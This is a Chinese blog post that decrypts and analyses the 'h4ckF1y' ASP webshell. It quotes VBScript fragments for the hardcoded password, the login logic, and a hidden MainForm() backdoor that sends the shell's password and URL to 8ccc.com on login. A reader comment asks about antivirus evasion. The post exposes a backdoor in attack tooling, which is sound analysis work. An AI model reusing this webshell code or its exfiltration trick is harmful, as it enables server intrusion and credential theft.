• 欢迎访问金刀客博客!
  • 2019,春节快乐!

“h4ckF1y” webshell的解密和后门全分析

原创天空 admin 4146次浏览 已收录 1个评论

先看看这个shell的截图

之所以拿这个shell出来时因为这个shell和先前的”一个人的战争”webshell有着关系,在那片文章我猜测那个shell是后来去后门然后再加的,我想现在的这个shell极有可能就是那个原始版本。这个shell是十三的加密,和”一个人的战争”webshell结构各方面基本上一直,只是在css方面有些差别,界面不同而已。
shell显示十三的函数加密,然后VBScript.Encode加密,层层剥离就ok。
现在说说这个shell
shell的头部

Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next
UserPass=”khdwu945046″ ‘密码
mName=”h4ckF1y” ‘后门名字
SiteURL=”Http://wWw.sLenk.Net” ‘网站
Copyright=”注:请勿用于非法用途,否则后果作者概不负责。” ‘版权

这个应当是lenk联盟的东西吧。
说说shell
登录方式

if session(“web2a2dmin”)<>UserPass then
if request.form(“pass”)<>“” then
if request.form(“pass”)=UserPass then
session(“web2a2dmin”)=UserPass
response.redirect url
else
rrs”非法登录”
end if
else
si=”

“&mname&”


密码:


“&Copyright&”

if instr(SI,SIC)<>0 then rrs sI
end if
response.end
end if

和以前的十三的差不多。
说说后门
在shell开头

URL=Request.ServerVariables(“URL”)
ServerIP=Request.ServerVariables(“LOCAL_ADDR”)
Action=Request(“Action”)
RootPath=Server.MapPath(“.”)
WWWRoot=Server.MapPath(“/”)
serveru=request.servervariables(“http_host”)&url
serverp=userpass
FolderPath=Request(“FolderPath”)
FName=Request(“FName”)
BackUrl=”

返回

serverp获取密码,serveru获取地址,在”一个人的战争“webshell中并没有调用这个变量。
这个shell的后门隐藏在MainForm()函数中
代码为

Function MainForm()
RRS”

直接发送密码和地址到8ccc.com进行处理。
MainForm怎么调用呢?

Case “CompactMdb”:CompactMdb FName
Case “DbManager”:DbManager()
Case “Course”:Course()
Case “ServerInfo”:ServerInfo()
Case Else MainForm()

这个函数是主框架函数,只要登录成功就马上执行,同时也执行后门程序。
附件中为加密文件
点击下载此文件
最开始出于共享的目的,发布了解密的源码,但是很多朋友劝说我,那么解密文件就不发布了。


金刀客博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明“h4ckF1y” webshell的解密和后门全分析
喜欢 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到
(1)个小伙伴在吐槽
  1. 解密之后,还免杀吗
    admin 于 2009-10-21 09:56 PM 回复
    解密后应当是不免杀了
    jkok202009-10-21 21:30 回复